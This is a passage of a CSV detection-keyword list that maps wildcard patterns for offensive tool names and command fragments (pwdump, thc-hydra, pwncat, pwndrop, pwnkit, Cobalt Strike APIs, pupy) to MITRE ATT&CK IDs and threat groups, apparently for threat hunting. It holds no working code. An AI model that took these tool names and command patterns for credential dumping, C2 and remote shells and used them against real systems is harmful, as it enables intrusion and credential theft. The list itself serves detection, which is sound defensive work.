Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*PWDump *","signature_keyword","Antivirus Signature","Antivirus signature - a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","N/A","N/A","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PWDump.*","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*pwdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*pwn_jenkins*","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1681","298","2023-03-09T09:16:14Z","2018-07-18T14:24:27Z" +"*pwn1sher/CS-BOFs*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*pwn1sher/WMEye*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*pwn3d_label = Pwn3d!*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6219","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z" +"*pwnat.exe*","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","2861","456","2023-08-08T05:09:00Z","2012-08-10T05:55:11Z" +"*pwncat-cs *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pwncat-cs -lp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pwncat-cs ssh://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pwndb --target @* --output *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pwndrop install*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwndrop start*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwndrop status*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwndrop stop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwndrop-linux-amd64*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwndrop-master*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*pwnedornot.py -d *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pwned-passwords-ntlm*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*pwnkit *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*pwnkit64decoded.c*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" +"*pwnsauc3/RWXFinder*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pxethief *","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*pxethief.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*py2exe *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe*.exe *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe*.msi *","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe*.py*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe-*.tar.gz*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe-*.whl*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe.build_exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe.freeze*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe.git*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe_setuptools.py*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*py2exe-master.zip*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*pycobalt.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt/aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt_debug_on*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt_path*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt_python*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pycobalt_timeout*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*pydictor*","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","2936","618","2023-01-11T13:02:06Z","2016-08-17T08:16:56Z" +"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" 